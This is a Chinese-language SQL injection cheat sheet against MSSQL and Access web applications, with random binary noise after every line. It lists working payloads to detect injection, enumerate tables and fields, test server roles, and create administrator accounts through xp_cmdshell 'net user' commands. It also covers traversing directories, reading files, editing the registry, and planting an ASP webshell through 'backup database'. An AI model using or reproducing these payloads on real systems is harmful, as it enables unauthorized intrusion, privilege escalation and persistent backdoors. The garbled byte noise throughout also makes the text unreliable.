1.判断是否有注入;and 1=1 ;and 1=2
)5�Ofr-Y
2.初步判断是否是mssql ;and user>0 �h�Z��UnNQ
2A(IsUtqO:
3.注入参数是字符'and [查询条件] and ''=' �DNGj8�1'c
sg�8�j}^VI
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Tw@:��sW�C
s E0l�dN"
5.判断数据库系统 xAu&O\V���
Zz^!Q�l��F
;and (select count(*) from sysobjects)>0 mssql `���+�5,=S
V�Z�CCM�h-
;and (select count(*) from msysobjects)>0 access K �yDP�D'�
�\KkA�U�6�
\>�<v1�x>;
3$h yV{��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \!�s0H_RJY
h�g�+0!DVx
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 OJ�XK]�dZ�
y�SNXjH
Q=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �cp� L���'
]��Aa���.=
9.(1)猜字段的ascii值(access) 'I�5��~<"E
�b�az~luM�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 /t�u���\�q
��{�]�3�Rk
(2)猜字段的ascii值(mssql) ~s�-"u
*�>
IpKpj"eoLy
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �JXk<t�5@D
lvk
r2Meu<
10.测试权限结构(mssql) �f�e+2�U|y
7R��=A]�@
#��Y�<�(7
�`U�y4>�?�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- e��pQdj�=h
��9t�_N�9@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <BhNmEo)2
y�({�EF~w�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- |$sMzPCxOk
/=~o�|-n8@
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �NG��\^>.8
"���>!<�OB
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- o 76QQ+hP�
O�E�5JA8/H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [hX�nw'Im/
)=6o�����,
;and 1=(select IS_MEMBER('db_owner'));-- �]n^TN�
r7
,Ep41v;T%`
�LRK��l3"M
CINC1Ll_24
11.添加mssql和系统的帐户 6/l{e)rX2o
w�6@8�cNXK
;exec master.dbo.sp_addlogin username;-- n}toUqUnk\
;exec master.dbo.sp_password null,username,password;-- ,,C�heR�O
�&b!|��Y
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- B|��.�8+Q�
=`��KV),�\
;exec master.dbo.xp_cmdshell 'net user username password �G_����)(?
$�\vT�iS'
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ^eY% T5K �
�uJu#Vr:�m
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �MT(G=r8�
)�sG�/�H8�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @;g|sty�h^
3�FhkK/@��
2��y@y<3�8
N]�7#Q.(~
12.(1)遍历目录 0u�we,�; �
+�nm?+��F
;create table dirs(paths varchar(100), id int) \p{$9e;8yT
kh���S� >�
;insert dirs exec master.dbo.xp_dirtree 'c:\' boWaH�}?0'
~�p�ve;(e=
;and (select top 1 paths from dirs)>0 �5M��mSQ_�
K %Qj<�{�)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �J>�%ua�k<
)R5=�GHmL�
{��>8�u��/
�'1�[Bb�s�
(2)遍历目录 Q�|�i�`s=|
O&ZVu>`�g�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Y�o a|.2f
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 K��
f}h{�X
�>�g�Gdz�L
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 L6IF0`M<,I
�e�O?@K$�I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 -�A)XY�z
�^rI�e"�Kx
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 x>*#cOVz;C
BY!M(X
jrZ
M?m)<vMr*
X9�/]<�Y<!
13.mssql中的存储过程 9w08)2$�Na
^y�p`<�=��
xp_regenumvalues 注册表根键, 子键 ��i)mQ?Y#o
\*.u�(8~2o
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $zYo~5M?i-
rIo)'L$�uU
xp_regread 根键,子键,键值名 $ITh)�#N�j
C|H/x\?zRv
;exec xp_regread *7:HO{P>Y�
j/*4�Wj�[�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Q��=T/�h�b
CZ.XE�MN\�
xp_regwrite 根键,子键, 值名, 值类型, 值 Y�pwMfl��4
LG>��lj$hO
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 -��na�o��M
'Nn>W5#))
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �PAH�k�F&�
d>r_a9� .u
xp_regdeletevalue 根键,子键,值名 �#�Y;tob�B
N\����Li�/
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 2/M:K����R
RY9h^��q*�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �FNB�4YZ6�
��VT~j�gsY
~L�uf�Hb�r
, �\
6*fXc
14.mssql的backup创建webshell [7*�$���Sd
4E~�!$Ustx
use model 0�4wO9�L�;
Bk�cA_�a:W
create table cmd(str image); |�*[�#Iii'
��ds|L'7�
insert into cmd(str) values (''); <|R�`N)AV;
~�n��)�<L7
backup database model to disk='c:\l.asp'; �zv[pf�D7a
+4--D�l?�
MT�UJsH\�
/By`FW ��Y
15.mssql内置函数 dp'x�d��>m
R7�j�'XU�
;and (select @@version)>0 获得Windows的版本号 }!n�90
9�L
/\C�5`>x��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ?�> 7SZiC`
R�<AT}!mkR
;and (select user_name())>0 爆当前系统的连接用户 6i.!C5Y�X]
`-QY<STTP9
;and (select db_name())>0 得到当前连接的数据库 y4F�uh nb>
[�y��f&�]0
We�u�%�&u-
"2a&G�3}t"
16.简洁的webshell B�9(e"�cMm
&ytnoj1L(
use model =%�IBl]Z!"
��>;M?f!�
create table cmd(str image); 9Vh>�ty1|_
whdoG{/���
insert into cmd(str) values (''); U9:w�^t[Pp
vh"��>��Z4
backup database model to disk='g:\wwwtest\l.asp';
